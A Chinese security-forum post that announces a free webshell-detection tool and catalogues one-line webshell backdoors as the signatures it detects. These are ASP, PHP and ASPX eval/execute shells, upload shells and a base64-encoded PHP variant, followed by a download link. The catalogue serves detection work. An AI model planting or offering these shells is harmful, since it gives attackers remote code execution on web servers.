WebShell查杀V1.0 永久免费版 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

WebShell查杀V1.0 永久免费版

admin 资源分享
一句话木马后门短小精悍,功能强大及其隐蔽性也非常好。而它其语句的多变性,以及通过加解密、转码等方式来自我隐藏的手法,让后门检测工作颇为棘手。

本文分类总结各种一句话及其变种,根据一句话特征并制作出了一款查杀一句话木马的软件

点击查看原图

[+]ASP一句话

1) <%eval request("sb")%>
2) <%execute request("sb")%>
3) <%execute(request("sb"))%>
4) <%execute request("sb")%><%'<% loop <%:%>
5) <%'<% loop <%:%><%execute request("sb")%>
6) <%execute request("sb")'<% loop <%:%>
7) <script language=vbs runat=server>eval(request("sb"))
8) %><%Eval(Request(chr(35)))%><%
9) <%eval request("sb")%>
10) <%eval_r(Request("0x001"))%>
11) <%ExecuteGlobal request("sb")%>
12) if Request("sb")<>"" then ExecuteGlobal request("sb") end if
13) <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%var hec = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : 'o040'};hec.性别((hec.名字)+'');%>
14) <%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

[+]php一句话

 <?php eval($_POST[sb]);?>
<?php @eval($_POST[sb]);?>
 <?php assert($_POST[sb]);?>
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>

[+]浅谈加密变种检测

·这里主要讨论base64算法加密的变种,能不能通过匹配加密以后的密文串来进行检测。
·Base64算法的细节不再深究,但需了解其最基本的一个属性:
加密时,将明文字符串分为每3个字符一组进行加密,每一组的3个明文字符在加密后变为4个密文字符,尾部不足3个时用”=”补尾。
简而言之,加密时,把3个字符变成4个字符。反之,解密过程把4个字符变成3个字符。

·Base64加密的一句话PHP后门: base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)
·其中 PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4= 即为base64编码后的字符串,将其解密可以得到: <?php eval($_POST[xiao])?>

[+]ASPX一句话

1) <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2) <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话
3) <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话
4) <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>


下载地址:http://www.hongkediguo.com/webshell.rar


标签: WebShell查杀

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表